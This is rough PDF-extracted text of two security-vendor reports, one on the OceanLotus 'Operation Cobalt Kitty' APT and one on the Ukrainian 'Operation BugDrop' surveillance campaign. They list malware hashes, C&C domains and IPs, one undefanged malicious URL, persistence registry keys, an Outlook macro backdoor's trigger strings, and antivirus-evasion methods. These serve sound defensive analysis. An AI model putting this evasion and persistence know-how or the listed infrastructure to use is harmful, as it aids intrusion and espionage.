2017 Cybereason Inc. All rights reserved.
sunjavascheduler.txt
7a02a835016bc630aa9e20bc4bc0967715459daa
Obfuscated / customized Mimikatz
File name
SHA-1 hash
dllhosts.exe
5a31342e8e33e2bbe17f182f2f2b508edb20933f
23c466c465ad09f0ebeca007121f73e5b630ecf6
14FDEF1F5469EB7B67EB9186AA0C30AFAF77A07C
KB571372.ps1
7CADFB90E36FA3100AF45AC6F37DC55828FC084A
KB647152.exe
7BA6BFEA546D0FC8469C09D8F84D30AB0F20A129
KB647164.exe
BDCADEAE92C7C662D771507D78689D4B62D897F9
kb412345.exe
e0aaa10bf812a17bb615637bf670c785bca34096
kb681234.exe
4bd060270da3b9666f5886cf4eeaef3164fad438
System.exe
33cb4e6e291d752b9dc3c85dfef63ce9cf0dbfbc
550f1d37d3dd09e023d552904cdfb342f2bf0d35
decoded base64
Mimikatz payload
c0950ac1be159e6ff1bf6c9593f06a3f0e721dd4
Customized credential dumpers
File name
SHA-1 hash
2017 Cybereason Inc. All rights reserved.
log.exe
7f812da330a617400cb2ff41028c859181fe663f
[GetPassword_x64]
SRCHUI.dll
adrclients.dll
29BD1BAC25F753693DF2DDF70B83F0E183D9550D
FC92EAC99460FA6F1A40D5A4ACD1B7C3C6647642
[HookPasswordChange]
KB471623.exe
6609A347932A11FA4C305817A78638E07F04B09F
[Custom password dumper]
doutlook.ps1
adobe.dat
adrclients.ps1
EBDD6059DA1ABD97E03D37BA001BAD4AA6BCBABD
B769FE81996CBF7666F916D741373C9C55C71F15
E64C2ED72A146271CCEE9EE904360230B69A2C1D
[Custom password dumper]
Miscellaneous tools
File name
SHA-1 hash
pshdll35.dll
pshdll40.dll
52852C5E478CC656D8C4E1917E356940768E7184
EDD5D8622E491DFA2AF50FE9191E788CC9B9AF89
[PSUnlock - PowerShell Bypass
tool]
KB-10233.exe
kb74891.exe
C5e19c02a9a1362c67ea87c1e049ce9056425788
0908a7fbc74e32cded8877ac983373ab289608b3
[NetCat]
IP.exe
cmd.exe
dllhost.exe
6aec53554f93c61f4e3977747328b8e2b1283af2
[IP check Tool]
Payloads from C&C servers
2017 Cybereason Inc. All rights reserved.
Payload SHA-1 hash
hxxp://104.237.218(.)67:80/icon.ico
6dc7bd14b93a647ebb1d2eccb752e750c4ab6b09
hxxp://support.chatconnecting(.)com:80/icon.ico
c41972517f268e214d1d6c446ca75e795646c5f2
hxxp://food.letsmiles(.)org/login.txt
9f95b81372eaf722a705d1f94a2632aad5b5c180
hxxp://food.letsmiles(.)org/9niL
5B4459252A9E67D085C8B6AC47048B276C7A6700
hxxp://23.227.196(.)210:80/logscreen.jpg
d8f31a78e1d158032f789290fa52ada6281c9a1f
50fec977ee3bfb6ba88e5dd009b81f0cae73955e
hxxp://45.114.117(.)137/eXYF
D1E3D0DDE443E9D294A39013C0D7261A411FF1C4
91BD627C7B8A34AB334B5E929AF6F981FCEBF268
hxxp://images.verginnet(.)info:80/ppap.png
F0A0FB4E005DD5982AF5CFD64D32C43DF79E1402
hxxp://176.107.176(.)6/QVPh
8FC9D1DADF5CEF6CFE6996E4DA9E4AD3132702C
hxxp://108.170.31(.)69/a
4a3f9e31dc6362ab9e632964caad984d1120a1a7
hxxp://support(.)chatconnecting(.)com/pic.png
bb82f02026cf515eab2cc88faa7d18148f424f72
hxxp://blog.versign(.)info/access/?version=4&lid=[reda
cted]&token=[redacted]
9e3971a2df15f5d9eb21d5da5a197e763c035f7a
hxxp://23.227.196(.)210/6tz8
bb82f02026cf515eab2cc88faa7d18148f424f72
hxxp://23.227.196(.)210/QVPh
8fc9d1dadf5cef6cfe6996e4da9e4ad3132702c5
hxxp://45.114.117(.)137/3mkQ
91bd627c7b8a34ab334b5e929af6f981fcebf268
hxxp://176.223.111(.)116:80/download/sido.jpg
5934262D2258E4F23E2079DB953DBEBED8F07981
hxxp://110.10.179(.)65:80/ptF2
DA2B3FF680A25FFB0DD4F55615168516222DFC10
hxxp://110.10.179(.)65:80/download/microsoftp.jpg
23EF081AF79E92C1FBA8B5E622025B821981C145
hxxp://110.10.179(.)65:80/download/microsoft.jpg
C845F3AF0A2B7E034CE43658276AF3B3E402EB7B
2017 Cybereason Inc. All rights reserved.
hxxp://27.102.70(.)211:80/image.jpg
9394B5EF0B8216528CED1FEE589F3ED0E88C7155
C&C IPs
45.114.117(.)137
104.24.119(.)185
104.24.118(.)185
23.227.196(.)210
23.227.196(.)126
184.95.51(.)179
176.107.177(.)216
192.121.176(.)148
103.41.177(.)33
184.95.51(.)181
23.227.199(.)121
108.170.31(.)69
104.27.167(.)79
104.27.166(.)79
176.107.176(.)6
184.95.51(.)190
176.223.111(.)116
110.10.179(.)65
27.102.70(.)211
C&C Domains
food.letsmiles(.)org
help.chatconnecting(.)com
*.letsmiles(.)org
support.chatconnecting(.)com
inbox.mailboxhus(.)com
blog.versign(.)info
news.blogtrands(.)net
stack.inveglob(.)net
tops.gamecousers(.)com
nsquery(.)net
tonholding(.)com
cloudwsus(.)net
nortonudt(.)net
teriava(.)com
tulationeva(.)com
2017 Cybereason Inc. All rights reserved.
vieweva(.)com
notificeva(.)com
images.verginnet(.)info
id.madsmans(.)com
lvjustin(.)com
play.paramountgame(.)com
Appendix A: Threat actor payloads caught in the wild
Domain
Details
VirusTotal
inbox.mailboxhus(.)com
support.chatconnecting(.)com
File name: Flash.exe
SHA-1: 01ffc3ee5c2c560d29aaa8ac3d17f0ea4f6c0c09
Submitted: 2016-12-28 09:51:13
Link
File name: Flash.exe
SHA-1:
562aeced9f83657be218919d6f443485de8fae9e
Submitted: 2017-01-18 19:00:41
Link
URL: hxxp://support(.)chatconnecting.com/2nx7m
Submitted: 2017-01-20 10:11:47
Link
File name: ID2016.doc
SHA-1: bfb3ca77d95d4f34982509380f2f146f63aa41bc
Submitted: 2016-11-23 08:18:43
Link
(45.114.117.137)
inbox.mailboxhus(.)com
support.chatconnecting(.)com
(45.114.117[.]137)
support.chatconnecting(.)com
(45.114.117[.]137)
support.chatconnecting(.)com
(45.114.117[.]137)
Malicious Word document (Phishing text in Vietnamese)
blog(.)versign(.)info
(23.227.196[.]210)
blog(.)versign(.)info
(23.227.196[.]210)
File name: tx32.dll
SHA-1:
604a1e1a6210c96e50b72f025921385fad943ddf
Submitted: 2016-08-15 04:04:46
File name: Gi
i th
ng m
i 2016 - H
ng.doc
SHA-1:
a5bddb5b10d673cbfe9b16a062ac78c9aa75b61c
Submitted: 2016-10-06 11:03:54
Link
Link
Malicious Word document with Phishing text in
Vietnamese
2017 Cybereason Inc. All rights reserved.
blog(.)versign(.)info
File name: Thong tin.doc
SHA-1: a5fbcbc17a1a0a4538fd987291f8dafd17878e33
Submitted: 2016-10-25
(23.227.196[.]210)
Link
Malicious Word document with Phishing text in
Vietnamese
Images.verginnet(.)info
File name: WinWord.exe
SHA-1:
ea67b24720da7b4adb5c7a8a9e8f208806fbc198
Submitted:
id.madsmans(.)com
Link
(176.107.176[.]6)
Cobalt Strike payload
Downloads hxxp://images.verginnet(.)info/2NX7M
Using Cobalt Strike malleable c2 oscp profile
tonholding(.)com
nsquery(.)net
File name: SndVolSSO.exe
SHA-1: 1fef52800fa9b752b98d3cbb8fff0c44046526aa
Submitted: 2016-08-01 09:03:58
Link
Denis Backdoor Variant
tonholding(.)com
nsquery(.)net
File name: Xwizard / KB12345678.exe
SHA-1:
d48602c3c73e8e33162e87891fb36a35f621b09b
Submitted: 2016-08-01
Link
teriava(.)com
File name: CiscoEapFast.exe
SHA-1:
77dd35901c0192e040deb9cc7a981733168afa74
Submitted: 2017-02-28 16:37:12
Link
Denis Backdoor Variant
Appendix B: Denis Backdoor samples in the wild
File name
SHA-1
Domain
msprivs.exe
97fdab2832550b9fea80ec1b9
c182f5139e9e947
teriava(.)com
WerFault.exe
F25d6a32aef1161c17830ea0c
b950e36b614280d
teriava(.)com
msprivs.exe
1878df8e9d8f3d432d0bc8520
595b2adb952fb85
teriava(.)com
CiscoEapFast.exe
094.exe
1a2cd9b94a70440a962d9ad7
8e5e46d7d22070d0
teriava(.)com,
tulationeva(.)com,
2017 Cybereason Inc. All rights reserved.
notificeva(.)com
CiscoEapFast.exe
77dd35901c0192e040deb9cc
7a981733168afa74
SwUSB.exe
F:\malware\Anh
ng\lsma.exe
88d35332ad30964af4f55f1e44 gl-appspot(.)org
c951b15a109832
tonholding(.)com
nsquery(.)net
Xwizard.exe
KB12345678.exe
d48602c3c73e8e33162e8789
1fb36a35f621b09b
tonholding(.)com
nsquery(.)net
SndVolSSO.exe
1fef52800fa9b752b98d3cbb8ff
f0c44046526aa
tonholding(.)com
nsquery(.)net
2017 Cybereason Inc. All rights reserved.
teriava(.)com,
tulationeva(.)com,
notificeva(.)com
Cybereason is the leader in endpoint protection, offering endpoint detection and response, next-generation antivirus, and
active monitoring services. Founded by elite intelligence professionals born and bred in offense-first hunting, Cybereason gives
enterprises the upper hand over cyber adversaries. The Cybereason platform is powered by a custom-built in-memory graph,
the only truly automated hunting engine anywhere. It detects behavioral patterns across every endpoint and surfaces malicious
operations in an exceptionally user-friendly interface. Cybereason is privately held and headquartered in Boston with offices in
London, Tel Aviv, and Tokyo.
2016 Cybereason. All rights reserved.
A Large Scale Cyber Espionage APT in Asia
cybereason.com /labs-operation-cobalt-kitty-a-large-scale-apt-in-asia-carried-out-by-the-oceanlotus-group/
5/23/2017
Operation Cobalt Kitty: A large-scale APT in Asia carried out by the OceanLotus Group
Post by: Assaf Dahan
The investigation of a massive cyber espionage APT (Advanced Persistent Threat) became a game of
one-upmanship between attackers and defenders. Dubbed Operation Cobalt Kitty, the APT targeted
a global corporation based in Asia with the goal of stealing proprietary business information. The threat actor
targeted the company
s top-level management by using sophisticated spear-phishing attacks as the initial
penetration vector, ultimately compromising the computers of vice presidents, senior directors and other key
personnel in the operational departments. During Operation Cobalt Kitty, the attackers compromised more than 40
PCs and servers, including the domain controller, file servers, Web application server and database server.
Forensic artifacts revealed that the attackers persisted on the network for at least a year before Cybereason was
deployed. The adversary proved very adaptive and responded to company
s security measures by periodically
changing tools, techniques and procedures (TTPs), allowing them to persist on the network for such an extensive
period of time. Over 80 payloads and numerous domains were observed in this operation
all of which were
undetected by traditional security products deployed in the company
s environment at the time of the attack.
The attackers arsenal consisted of modified publicly-available tools as well as six undocumented custom-built
tools, which Cybereason considers the threat actor
s signature tools. Among these tools are two backdoors that
exploited DLL sideloading attack in Microsoft, Google and Kaspersky applications. In addition, they developed
a novel and stealthy backdoor that targets Microsoft Outlook for command-and-control channel and data
exfiltration.
Based on the tools, modus operandi and IOCs (indicators of compromise) observed in Operation Cobalt Kitty,
Cybereason attributes this large-scale cyber espionage APT to the
OceanLotus Group
(which is also known as,
APT-C-00, SeaLotus and APT32). For detailed information tying Operation Cobalt Kitty to the OceanLotus Group,
please see our Attacker
s Arsenal and Threat Actor Profile sections.
Cybereason also attributes the recently reported Backdoor.Win32.Denis to the OceanLotus Group, which at the time
of this report
s writing, had not been officially linked to this threat actor.
Finally, this report offers a rare glimpse into what a cyber espionage APT looks like
under-the-hood
. Cybereason
was able to monitor and detect the entire attack lifecycle, from infiltration to exfiltration and all the steps in
between.
Our report contains the following detailed sections (PDF):
High-level attack outline: A cat-and-mouse game in four acts
The following sections outline the four phases of the attack as observed by Cybereason
s analysts, who were called
to investigate the environment after the company
s IT department suspected that their network was breached but
could not trace the source.
Phase one: Fileless operation (PowerShell and Cobalt Strike payloads)
1/14
Based on the forensic evidence collected from the environment, phase one was the continuation of the original
attack that began about a year before Cybereason was deployed in the environment. During that phase, the threat
actor operated a fileless PowerShell-based infrastructure, using customized PowerShell payloads taken from
known offensive frameworks such as Cobalt Strike, PowerSploit and Nishang.
The initial penetration vector was carried out by social engineering. Carefully selected group of employees received
spear-phishing emails, containing either links to malicious sites or weaponized Word documents. These documents
contained malicious macros that created persistence on the compromised machine using two scheduled tasks,
whose purpose was to download secondary payloads (mainly Cobalt Strike Beacon):
Scheduled task 1: Downloads a COM scriptlet that redirects to Cobalt Strike payload:
Scheduled task 2: Uses Javascript to download a Cobalt Strike Beacon:
See more detailed analysis of the malicious documents in our Attack Life Cycle section.
Fileless payload delivery infrastructure
2/14
In the first phase of the attack, the attackers used a fileless in-memory payload delivery infrastructure consisting of
the following components:
1. VBS and PowerShell-based loaders
The attackers dropped Visual Basic and PowerShell scripts in folders that they created under the ProgramData (a
hidden folder, by default). The attackers created persistence using Windows
registry, services and scheduled tasks.
This persistence mechanism ensured that the loader scripts would execute either at startup or at predetermined
intervals.
Values found in Windows
Registry: the VBS scripts are executed by Windows
Wscript at startup:
The .vbs scripts as well as the .txt files contain the loader
s script, which launches PowerShell with a base64
encoded command, which either loads another PowerShell script (e.g Cobalt Strike Beacon) or fetches a payload
from the command-and-control (C&C) server:
3/14
2. In-memory fileless payloads from C&C servers
The payloads served by the C&C servers are mostly PowerShell scripts with embedded base64-encoded payloads
(Metasploit and Cobalt Strike payloads):
Example 1: PowerShell payload with embedded Shellcode downloading Cobalt Strike Beacon
The decoded payload is a shellcode, whose purpose is to retrieve a Cobalt Strike Beacon from the C&C server:
4/14
Example 2: Cobalt Strike Beacon embedded in obfuscated PowerShell
A second type of an obfuscated PowerShell payload consisted of Cobalt Strike
s Beacon payload:
Less than 48 hours after Cybereason alerted the company about the breach , the attackers started to change
their approach and almost completely abandoned the PowerShell infrastructure that they had been using
replacing
it with sophisticated custom-built backdoors. The attackers
remarkable ability to quickly adapt demonstrated their
skill and familiarity with and command of the company
s network and its operations.
5/14
The attackers most likely replaced the PowerShell infrastructure after the company used both Windows Group
Policy Object (GPO) and Cybereason
s execution prevention feature to prevent PowerShell execution.
Phase two: Backdoors exploiting DLL-hijacking and using DNS tunneling
After realizing that the PowerShell infrastructure had been discovered, the attackers had to quickly replace it to
maintain persistence and continue the operation. Replacing this infrastructure in 48 hours suggests that the threat
actors were prepared for such a scenario.
During the second phase of the attack, the attackers introduced two sophisticated backdoors that they
attempted to deploy on selected targets. The introduction of the backdoors is a key turning point in the
investigation since it demonstrated the threat actor
s resourcefulness and skill-set.
At the time of the attack, these backdoors were undetected and undocumented by any security vendor.
Recently, Kaspersky researchers identified a variant of one of the backdoors as Backdoor.Win32.Denis. The
attackers had to make sure that they remained undetected so the backdoors were designed to be as stealthy as
possible. To avoid being discovered, the malware authors used these techniques:
Backdoors exploiting DLL hijacking against trusted applications
The backdoor exploited a vulnerability called
DLL hijacking
in order to
hide
the malware inside trusted software.
This technique exploits a security vulnerability found in legitimate software, which allows the attackers to load a fake
DLL and execute its malicious code.
Please see an analysis of the backdoors in the Attacker
s Arsenal section.
The attackers exploited this vulnerability against the following trusted applications:
Windows Search (vulnerable applications: searchindexer.exe /searchprotoclhost.exe)
Fake DLL: msfte.dll (638b7b0536217c8923e856f4138d9caff7eb309d)
6/14
Google Update (d30e8c7543adbc801d675068530b57d75cabb13f)
Fake DLL: goopdate.dll (973b1ca8661be6651114edf29b10b31db4e218f7)
7/14
Kaspersky
s Avpia
(691686839681adb345728806889925dc4eddb74e)
Fake DLL: product_info.dll
(3cf4b44c9470fb5bd0c16996c4b2a338502a7517)
By exploiting legitimate software, the attackers bypassed application whitelisting and legitimate security software,
allowing them to continue their operations without raising any suspicions.
DNS Tunneling as C2 channel
In attempt to overcome network filtering solutions, the attackers implemented a stealthier C2 communication
method, using
DNS Tunneling
a method of C2 communicating and data exfiltration using the DNS protocol. To
ensure that the DNS traffic would not be filtered, the attackers configured the backdoor to communicate with Google
and OpenDNS DNS servers, since most organizations and security products will not filter traffic to those two major
DNS services.
8/14
The screenshot below shows the traffic generated by the backdoor and demonstrates DNS Tunneling for C2
communication. As shown, while the destination IP is
8.8.8.8
Google
s DNS server
the malicious domain is
hiding
inside the DNS packet:
9/14
Phase three: Novel MS Outlook backdoor and lateral movement spree
In the third phase of the operation, the attackers harvested credentials stored on the compromised machines and
performed lateral movement and infected new machines. The attackers also introduced a very rare and stealthy
technique to communicate with their servers and exfiltrate data using Microsoft Outlook.
Outlook macro backdoor
In a relentless attempt to remain undetected, the attackers devised a very stealthy C2 channel that is hard to detect
10/14
since it leverages an email-based C2 channel. The attackers installed a backdoor macro in Microsoft Outlook
that enabled them to execute commands, deploy their tools and steal valuable data from the compromised
machines.
For a detailed analysis of the Outlook backdoor, please see the Attacker
s Arsenal section.
This technique works as follows:
1. The malicious macro scans the victim
s Outlook inbox and looks for the strings
$$cpte
and
$$ecpte
2. Then the macro will open a CMD shell that will execute whatever instruction / command is in between the
strings.
3. The macro deletes the message from inbox to ensure minimal risk of exposure.
4. The macro searches for the special strings in the
Deleted Items
folder to find the attacker
s email address
and sends the data back to the attackers via email.
5. Lastly, the macro will delete any evidence of the emails received or sent by the attackers.
Credential dumping and lateral movement
The attackers used the famous Mimikatz credential dumping tool as their main tool to obtain credentials including
user passwords, NTLM hashes and Kerberos tickets. Mimikatz is a very popular tool and is detected by most
antivirus vendors and other security products. Therefore, the attackers used over 10 different customized Mimikatz
payloads, which were obfuscated and packed in a way that allowed them to evade antivirus detection.
The following are examples of Mimikatz command line arguments detected during the attack:
11/14
The stolen credentials were used to infect more machines, leveraging Windows built-in tools as well as pass-theticket and pass-the-hash attacks.
Phase four: New arsenal and attempt to restore PowerShell infrastructure
After a four week lull and no apparent malicious activity, the attackers returned to the scene and introduced new and
improved tools aimed at bypassing the security mitigations that were implemented by the company
s IT team. These
tools and methods mainly allowed them to bypass the PowerShell execution restrictions and password
dumping mitigations.
During that phase, Cybereason found a compromised server that was used as the main attacking machine, where
the attackers stored their arsenal in a network share, which made it easier to spread their tools to other machines
on the network. The attackers
arsenal consisted:
New variants of Denis and Goopy backdoors
PowerShell Restriction Bypass Tool
Adapted from PSUnlock Github project.
PowerShell Cobalt Strike Beacon
New payload + new C2 domain
12/14
PowerShell Obfuscator
All the new PowerShell payloads are obfuscated using a publicly available
script adapted from a Daniel Bohannon
s GitHub project.
HookPasswordChange
Inspired by tools found on GitHub, this tool alerts the attackers if a password has
been changed. Using this tool, the attackers could overcome a password reset. The attackers modified their
tool.
Customized Windows Credentials Dumper
A PowerShell password dumper that is based on a known
password dumping tool, using PowerShell bypass and reflective loading. The attackers specifically used it to
obtain Outlook passwords.
Customized Outlook Credentials Dumper
Inspired by known Outlook credentials dumpers.
Mimikatz
PowerShell and Binary versions, with multiple layers of obfuscation.
Please see the Attacker
s Arsenal section for detailed analysis of the tools.
An analysis of this arsenal shows that the attackers went out of their way to restore the PowerShell-based
infrastructure, even though it had already been detected and shut down once. The attackers
preference to use a
fileless infrastructure specifically in conjunction with Cobalt Strike is very evident. This could suggest that the
attackers preferred to use known tools that are more expendable rather than using their own custom-built tools,
which were used as a last resort.
Conclusion
Operation Cobalt Kitty was a major cyber espionage APT that targeted a global corporation in Asia and was carried
out by the OceanLotus Group. The analysis of this APT proves how determined and motivated the attackers were.
They continuously changed techniques and upgraded their arsenal to remain under the radar. In fact, they never
gave up, even when the attack was exposed and shut down by the defenders.
During the investigation of Operation Cobalt Kitty, Cybereason uncovered and analyzed new tools in the OceanLotus
Group
s attack arsenal, such as:
New backdoor (
Goopy
) using HTTP and DNS Tunneling for C2 communication.
Undocumented backdoor that used Outlook for C2 communication and data exfiltration.
Backdoors exploiting DLL sideloading attacks in legitimate applications from Microsoft, Google and
Kaspersky.
Three customized credential dumping tools, which are inspired by known tools.
In addition, Cybereason uncovered new variants of the
Denis
backdoor and managed to attribute the backdoor to
the OceanLotus Group
a connection that had not been publicly reported before.
This report provides a rare deep dive into a sophisticated APT that was carried out by one of the most fascinating
groups operating in Asia. The ability to closely monitor and detect the stages of an entire APT lifecycle
from initial
infiltration to data exfiltration
is far from trivial.
The fact that most of the attackers
tools were not detected by the antivirus software and other security products
deployed in the company
s environment before Cybereason, is not surprising. The attackers obviously invested
significant time and effort in keeping the operation undetected, striving to evade antivirus detection.
As the investigation progressed, some of the IOCs observed in Operation Cobalt Kitty started to emerge in the wild,
and recently some were even reported being used in other campaigns. It is important to remember, however, that
IOCs have a tendency to change over time. Therefore, understanding a threat actor
s behavioral patterns is
13/14
essential in combatting modern and sophisticated APTs. The modus operandi and tools served as behavioral
fingerprints also played an important role in tying Operation Cobalt Kitty to the OceanLotus Group.
Lastly, our research provides an important testimony to the capabilities and working methods of the OceanLotus
Group. Operation Cobalt Kitty is unique in many ways, nonetheless, it is still just one link in the group
s evergrowing chain of APT campaigns. Orchestrating multiple APT campaigns in parallel and attacking a broad spectrum
of targets takes an incredible amount of resources, time, manpower and motivation. This combination is likely to be
more common among nation-state actors. While the are many rumours and speculations circulating in the InfoSec
community, at the time of writing, there was no publicly available evidence that can confirm that the OceanLotus
Group is a nation-state threat actor.
Until such evidence is made public, we will leave it to our readers to judge for themselves.
To be continued
Meow.
advanced persistent threat, APT, Cobalt Strike, Cybereason, Cybereason Labs, DLL hijacking, DNS Tunneling,
fileless malware, OceanLotus Group, Operation Cobalt Kitty, Powershell
Check out more research from Cybereason Labs
See all lab blog posts
14/14
Operation BugDrop: CyberX Discovers Large-Scale CyberReconnaissance Operation Targeting Ukrainian Organizations
cyberx-labs.com/en/blog/operation-bugdrop-cyberx-discovers-large-scale-cyber-reconnaissance-operation/
By Phil Neray
2/15/2017
CyberX has discovered a new, large-scale cyber-reconnaissance
operation targeting a broad range of targets in the Ukraine.
Because it eavesdrops on sensitive conversations by remotely
controlling PC microphones
in order to surreptitiously
its
targets
and uses Dropbox to store exfiltrated data, CyberX has
named it
Operation BugDrop.
Operation BugDrop: Targets
CyberX has confirmed at least 70 victims successfully targeted by
the operation in a range of sectors including critical infrastructure,
media, and scientific research. The operation seeks to capture a
range of sensitive information from its targets including audio
recordings of conversations, screen shots, documents and
passwords. Unlike video recordings, which are often blocked by
users simply placing tape over the camera lens, it is virtually
impossible to block your computer
s microphone without physically
accessing and disabling the PC hardware.
Most of the targets are located in the Ukraine, but there are also targets in Russia and a smaller number of targets
in Saudi Arabia and Austria. Many targets are located in the self-declared separatist states of Donetsk and Luhansk,
which have been classified as terrorist organizations by the Ukrainian government.
Examples of Operation BugDrop targets identified by CyberX so far include:
A company that designs remote monitoring systems for oil & gas pipeline infrastructures.
An international organization that monitors human rights, counter-terrorism and cyberattacks on critical
infrastructure in the Ukraine.
An engineering company that designs electrical substations, gas distribution pipelines, and water supply
plants.
A scientific research institute.
Editors of Ukrainian newspapers.
Operation BugDrop is a well-organized operation that employs sophisticated malware and appears to be backed by
an organization with substantial resources. In particular, the operation requires a massive back-end infrastructure to
store, decrypt and analyze several GB per day of unstructured data that is being captured from its targets. A large
team of human analysts is also required to manually sort through captured data and process it manually and/or with
Big Data-like analytics.
Initially, CyberX saw similarities between Operation BugDrop and a previous cyber-surveillance operation
discovered by ESET in May 2016 called Operation Groundbait. However, despite some similarities in the Tactics,
Techniques, and Procedures (TTPs) used by the hackers in both operations, Operation BugDrop
s TTPs are
1/11
significantly more sophisticated than those used in the earlier operation. For example, it uses:
Dropbox for data exfiltration, a clever approach because Dropbox traffic is typically not blocked or monitored
by corporate firewalls.
Reflective DLL Injection, an advanced technique for injecting malware that was also used by BlackEnergy in
the Ukrainian grid attacks and by Duqu in the Stuxnet attacks on Iranian nuclear facilities. Reflective DLL
Injection loads malicious code without calling the normal Windows API calls, thereby bypassing security
verification of the code before its gets loaded into memory.
Encrypted DLLs, thereby avoiding detection by common anti-virus and sandboxing systems because they
unable to analyze encrypted files.
Legitimate free web hosting sites for its command-and-control infrastructure. C&C servers are a potential
pitfall for attackers as investigators can often identify attackers using registration details for the C&C server
obtained via freely-available tools such as whois and PassiveTotal. Free web hosting sites, on the other
hand, require little or no registration information. Operation BugDrop uses a free web hosting site to store the
core malware module that gets downloaded to infected victims. In comparison, the Groundbait attackers
registered and paid for their own malicious domains and IP addressees.
Operation BugDrop infects its victims using targeted email phishing attacks and malicious macros embedded in
Microsoft Office attachments. It also uses clever social engineering to trick users into enabling macros if they aren
already enabled.
How CyberX Investigated Operation BugDrop
CyberX
s Threat Intelligence Research team initially discovered Operation BugDrop malware in the wild. The team
then reverse-engineered the code to analyze its various components (decoy documents used in phishing attacks,
droppers, main module, microphone module, etc.) and how the malware communicates with its C&C servers. The
team also needed to reverse-engineer exactly how the malware generates its encryption keys.
Distribution of Targets by Geography
2/11
Compilation Dates
The modules were compiled about a month after ESET announced the existence of Operation Groundbait. If the
two operations are indeed related, this might indicate the group decided it needed to change its TTPs to avoid
detection.
Technical Details
3/11
High-level view of malware architecture
1. Infection Method
Users are targeted via specially crafted phishing emails and prompted to open a Microsoft Word decoy
document containing malicious macros.
If macros are disabled, users are presented with a dialog box (below) prompting them to enable macros. The
dialog box is well designed and appears to be an authentic Microsoft Office message.
4/11
Russian text in dialog box:
Office.
This is translated as:
Attention! The file was created in a newer version of Microsoft Office programs.
You must enable macros to correctly display the contents of a document.
Based on the document metadata, the language in which the list is written is Ukrainian, but the original
language of the document is Russian.
The creator of the decoy document creator is named
Siada.
Last modified date is 2016-12-22 10:37:00
5/11
The document itself (below) shows a list of military personnel with personal details such as birthdate and
address:
Decoy document with personal information about military personnel
2. Main Downloader
The main downloader is extracted from the decoy document via a malicious VB script that runs it from the
temp folder.
The downloader has low detection rates (detected by only 4 out of 54 AV products).
3. Dropper
Stage 0
The icon for the downloader EXE was copied from a Russian social media site
(http://sevastopol.su/world.php?id=90195).
The icon itself is a meme that jokes about Ukrainians (http://s017.radikal.ru/i424/1609/83/0c3a23de7967.jpg).
Dropper icon
6/11
Russian social media site from where icon for dropper EXE was obtained
The dropper has 2 DLLs stored in its resources; they are XOR
ed in such way that the current byte is XOR
with the previous byte.
This technique is much better than just plain XOR because it results in a byte distribution that doesn
t look
like a normal Portable Executable (PE) file loader. This helps obfuscate the file so that it will not be detected
by anti-virus systems.
The DLLs are extracted into the app data folder:
%USERPROFILE%\AppData\Roaming\Microsoft\VSA\.nlp
Stage 1
%USERPROFILE%\AppData\Roaming\Microsoft\Protect\.nlp.hist
Stage 2
The first stage is executed and the DLL is loaded using Reflective DLL Injection.
4. Dropper
Stage 1
Achieving Persistency
Internal name: loadCryptRunner.dll
Compiled: Mon Dec 12 10:09:15 2016
7/11
Responsible for persistency and executing the downloader DLL, the Stage 1 Dropper registers itself in the
registry under the key:
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\drvpath
RUNDLL32
%USERPROFILE%\AppData\Roaming\Microsoft\VSA\klnihw22.nlp
, RUNNER
The communication DLL is also loaded using Reflective DLL Injection.
5. Dropper
Stage 2
Downloader for Main Module
Internal name: esmina.dll
Compiled: Mon Oct 10 14:47:28 2016
The main purpose of this DLL is to download the main module
The main module is hosted on a free web hosting site with the following URL:
windows-problem-reporting.site88.net [Note: Do not visit this malicious site.]
We were unable to find any information about this URL in public data sources.
Attempting to directly access the URL leads to an
HTTP/1.1 404 Not Found
message.
It appear as if downloading the module requires manual approval, indicating the need for a human analyst or
handler in the loop.
The main module is then downloaded and loaded into memory using Reflective DLL Injection.
6. Main Module
The main module downloads the various data-stealing plugins assigned to each victim, and executes them.
It also collects locally-stored stolen data and uploads it to Dropbox.
The main module incorporates a number of anti-Reverse Engineering (RE) techniques:
Checks if a debugger is present.
Checks if process is running in a virtualized environment.
Checks if ProcessExplorer is running. ProcessExplorer is used to identify malware hiding inside a
legitimate process as
a DLL, which occurs as a result of DLL injection.
Checks to see if WireShark is running. WireShark can be used to identify malicious traffic originating
on your computer.
It registers itself in the registry under the key:
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\hlpAsist
RUNDLL32
%USERPROFILE%\AppData\Roaming\Microsoft\MSDN\iodonk18.dll
, IDLE
7. Dropbox Mechanisms
8/11
There are 3 directories on the server:
obx
Contains modules used by the main module
ibx
Contains exfiltrated output uploaded by the plugins
rbx- Contains basic information about the connected client
After the stored data is retrieved by the attackers, it is deleted from the Dropbox account.
The Dropbox user that registered the account has the following details:
Name: P*****
Email: P********@mail.ru
8. Encryption Mechanisms
The data-stealing plugins store all their output in: %USERPROFILE%\AppData\Roaming\Media
Before being sent to Dropbox by the main module, the files are encrypted with Blowfish.
The Blowfish encryption key is the client ID.
9. Data-Stealing Plugins
File Collector: Searches for variety of file types that are stored locally or on shared drives (including doc,
docx, xls, xlsx, ppt, pptx, pdf, zip, rar, db, txt) . Files are uploaded on-demand.
USB File Collector: Searches for variety of file types on USB drives (including doc, docx, xls, xlsx, ppt, pptx,
pdf, zip, rar, db, txt).
Browser Data Collector: Used to steal passwords and other sensitive information stored in browsers.
Microphone: Captures audio conversations.
Computer Info Collector: Collects data about the client such as Windows OS version, computer name, user
name, IP address, MAC address, antivirus software, etc.
Not all of the plugins are downloaded to every target. Each module has a unique extension which is the client ID.
This is how the main module knows which modules should be downloaded to a particular target.
Conclusions
1) Operation BugDrop was a cyber-reconnaissance mission; its goal was to gather intelligence about targets in
various domains including critical infrastructure, media, and scientific research. We have no evidence that any
damage or harm has occurred from this operation, however identifying, locating and performing reconnaissance on
targets is usually the first phase of operations with broader objectives.
2) Skilled hackers with substantial financial resources carried out Operation BugDrop. Given the amount of data
analysis that needed to be done on daily basis, we believe BugDrop was heavily staffed. Given the sophistication of
the code and how well the operation was executed, we have concluded that those carrying it out have previous field
experience. While we are comfortable assigning nation-state level capabilities to this operation, we have no forensic
evidence that links BugDrop to a specific nation-state or group.
Attribution
is notoriously difficult, with the added
difficulty that skilled hackers can easily fake clues or evidence to throw people off their tail.
3) Private and public sector organizations need to continuously monitor their IT and OT networks for anomalous
activities indicating they
ve been compromised. Fortunately, new algorithmic technologies like behavioral analytics
are now available to rapidly identify unusual or unauthorized activities with minimal false positives, especially when
9/11
combined with actionable threat intelligence. Organizations also need deep forensics to identify the scope and
impact of a breach, as well as an enterprise-wide incident response plan that can be carried out quickly and at scale.
Appendix
